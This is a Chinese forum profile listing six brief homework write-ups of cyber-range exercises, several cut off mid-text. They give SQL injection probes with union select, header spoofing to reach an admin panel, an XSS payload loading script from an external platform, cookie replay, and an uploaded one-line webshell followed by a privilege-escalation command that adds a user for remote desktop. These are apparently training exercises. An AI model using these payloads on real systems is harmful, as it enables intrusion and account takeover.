九五

0Follows
1Fans
10Threads
Back Forum Home

You have published 10articleAdd Thread

靶场第六题 九五作业

通过第五题进入了后台找到产品管理可以修改上传文件制作了一句话木马程序,把后缀名改为cer可以上传之后用菜刀连接,但是没有权限访问C盘通过E:5\admin\Databackup\打开CMD输入命令whoima,拒绝访问输入命令iis6.exe "net user jiuwu 1234 /add"net user发现成功添加用户mstsc /admin命令,远程连接桌面120.2

 2018-7-31
 1 
 419 

靶场第五题 九五作业

用火狐浏览器打开靶场修改管理员cookie按F12,点击存储选项之前得到cookie值为ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC名称修改为ADMINSESSIONIDCSTRCSDQ值修改为LBMLMBCCNPFINOANFGLPCFBC然后点击准备好了吗就可以进后台了

 2018-7-31
 0 
 369 

靶场第四题 九五作业

打开www.xss9.com 在查看代码选项中复制</tExtArEa>'"><sCRiPt sRC=https://xss9.com/qsSR></sCrIpT>插入到带主题及以下带*的条目中之后再XSS平台得到

 2018-7-31
 0 
 378 

靶场第三题 九五的作业

进入后台说不允许从外部链接访问后台管理页面用谷歌浏览器,打开modify headers插件设置referer的值 http://127.0.0.1/admin123/default.asp设置host的值  127.0.0.1:8080居然可以访问了

 2018-7-31
 0 
 393 

靶场第二题 九五作业

点击新闻得到链接http://120.203.13.75:8001/shownews.asp?id=171尝试 order by 10 页面正常,order by 11显示数据错误,判断有10个字段猜测有没有admin这个表 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin弹出框显示非法字符用谷歌浏览器打开http://120.203.13.

 2018-7-31
 2 
 482 

靶场第一题 九五作业

点击查看新闻得到网址http://120.203.13.75:6815/?id=1尝试?id=1 and 1=1 页面正常,?id=1 and 1=2,页面显示不正常,判断存在注入点猜测字段数?id=1 order by 5,最后尝试?id=1 order by 2页面正常查询数据库版本and 1=2 union select 1,version()得到数据库版本5.5.53  查询数据

 2018-7-31
 0 
 422